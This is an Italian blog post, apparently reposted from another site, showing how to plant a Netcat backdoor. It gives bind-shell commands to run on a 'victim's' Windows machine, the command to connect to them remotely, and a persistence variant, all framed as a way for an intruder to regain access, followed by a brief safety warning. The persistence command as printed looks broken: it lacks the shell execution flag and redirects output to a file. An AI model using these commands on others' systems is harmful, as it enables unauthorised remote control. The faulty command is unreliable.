venerdì 28 agosto 2009

Creare una backdoor con Netcat

Cos’è una backdoor? Una “porta di servizio” che permette l’amministrazione remota del computer.

In genere dopo aver ottenuto l’accesso al computer l’hacker ha la necessità di tornare nel sistema in modo più agevole, oppure ha bisogno di un’interfaccia a linea di comando (shell) con la quale poter agire comodamente.

Per attivare netcat come backdoor usiamo il seguente comando (sul computer della vittima):

nc -l -p 9999 -vv -e cmd.exe

Vediamo nel dettaglio. Il parametro -l dice a netcat di “ascoltare” sulla porta Tcp indicata dal parametro -p, in questo caso 9999 (valore arbitrario). Il cuore della tecnica è il parametro -e, che seguito da cmd.exe istruisce netcat a eseguire (-e ovvero exec) il comando specificato (cmd.exe, la shell di Windows) veicolando l’input/output attraverso netcat stesso.

Come ci si collega ad un host su cui è stata messa questa backdoor? Ma naturalmente con netcat!
Se il computer sotto controllo ha come indirizzo Ip 192.168.0.1, otterremo l’accesso remoto con il comando:

nc 192.168.0.1 9999 -vv

ci troveremo di fronte al prompt dei comandi di Windows; solo che questo prompt non è della nostra macchina, ma quello della macchina remota!
Per uscire dalla backdoor basta semplicemente digitare exit e la connessione si chiude. E qui c’è un problema.

Una volta chiusa la connessione in netcat remoto smette di ascoltare, semplicemente termina l’esecuzione; quindi non sarà più possibile collegarsi da remoto. Per aggirare questo problema ci viene in soccorso il parametro -L.

nc -L -p 9999 -vv > trojan <– notare la L maiuscola al posto di -l

Il parametro -L istruisce netcat a mantenere aperta la porta e restare in ascolto anche quando il programma eseguito con il comando -e viene interrotto. Così si potrà entrare e uscire dal sistema a piacere.

Un avvertimento necessario: questa tecnica è pericolosissima! Aprire una backdoor in questo modo, aprire una shell senza la protezione di una password è quasi un suicidio, significa spalancare una porta del sistema a chiunque. Se lo fate su un vostro sistema, se proprio dovete farlo, fatelo per periodi brevissimi e su porte non standard o non facilmente intuibili (9999 e 12345 non vanno benissimo).

Fonte: www.pillolhacking.net





0 commenti:

Posta un commento